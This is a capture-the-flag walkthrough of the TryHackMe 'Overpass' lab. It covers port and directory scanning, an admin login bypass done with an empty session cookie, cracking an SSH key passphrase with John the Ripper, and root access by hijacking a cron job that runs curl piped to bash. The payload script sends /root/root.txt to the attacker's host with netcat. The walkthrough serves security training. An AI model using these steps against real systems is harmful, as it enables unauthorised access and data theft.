Overpass

What happens when some broke CompSci students make a password manager?

TryHackMe - Overpass Created by NinjaJc01

Scanning (IP : 10.10.233.36)

1. NMAP

> sudo nmap -sC -sV 10.10.233.36

Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-09 06:30 EDT
Nmap scan report for 10.10.233.36
Host is up (0.19s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 37:96:85:98:d1:00:9c:14:63:d9:b0:34:75:b1:f9:57 (RSA)
|   256 53:75:fa:c0:65:da:dd:b1:e8:dd:40:b8:f6:82:39:24 (ECDSA)
|_  256 1c:4a:da:1f:36:54:6d:a6:c6:17:00:27:2e:67:75:9c (ED25519)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Overpass
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.57 seconds

2. GoBuster

> gobuster dir -u http://10.10.233.36 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt > gobuster.txt

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.175.22
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/09/13 07:51:58 Starting gobuster in directory enumeration mode
===============================================================
/img                  (Status: 301) [Size: 0] [--> img/]
/downloads            (Status: 301) [Size: 0] [--> downloads/]
/aboutus              (Status: 301) [Size: 0] [--> aboutus/]  
/admin                (Status: 301) [Size: 42] [--> /admin/]  
/css                  (Status: 301) [Size: 0] [--> css/]
===============================================================
2021/09/13 08:59:14 Finished
===============================================================

http://10.10.99.250/admin/ I see a login page with some javascript files in it. In file login.js found a vulnerability.

if (statusOrCookie === "Incorrect credentials") {
        loginStatus.textContent = "Incorrect Credentials"
        passwordBox.value=""
    } else {
        Cookies.set("SessionToken",statusOrCookie)
        window.location = "/admin"
    }
}

I try to set value SessionToken empty in cookie and BOOM !!. I logged in as admin. I says

Welcome to the Overpass Administrator area

A secure password manager with support for Windows, Linux, MacOS and more

Since you keep forgetting your password, James, I've set up SSH keys for you.

If you forget the password for this, crack it yourself. I'm tired of fixing stuff for you. Also, we really need to talk about this "Military Grade" encryption. - Paradox

Decoding the SSH Private Key

To Decode the SSH key I use JohnTheRipper Tool in Kali-Linux. First to convert RSA key to hash I use ssh2john.py script.

python ssh2john.py id_rsa > id_rsa.hash

Now to crack the hash.

> john id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 1 candidate buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
Proceeding with incremental:ASCII
james13          (id_rsa)

Passphrase for private key is james13. Now to decode it use -

openssl rsa -in id_rsa -out out.key -passin pass:james13

By the description of admin page it is clear that username is james.

ssh -i out.key james@10.10.175.22 -p 22

Now for user.txt -

cat user.txt

Privileges escalations (root.txt)

There is a weird file todo.txt in james home directory. It gives a hint to see cronjobs. And a weird thing is there in crontabs file.

* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash

Then I see that I can edit the /etc/hosts file and change the IP of overpass.thmdomain to my machine and then I can serve any malacious file to run n server as a root.

buildscript.sh

#!/bin/sh

cat /root/root.txt | nc <MY_IP> 1234

Then I run a python server sering file /downloads/src/buildscript.sh on port 80.

python3 -m http.server 80

And open a netcat listner to listine the flag echo by vulnerable machine.

nc -lnvp 1234

And BOOM!! it gives the content of root.txt file.

THANK YOU FOR READING :)

PreviousInclusion NextRootMe

Last updated 4 years ago

Was this helpful?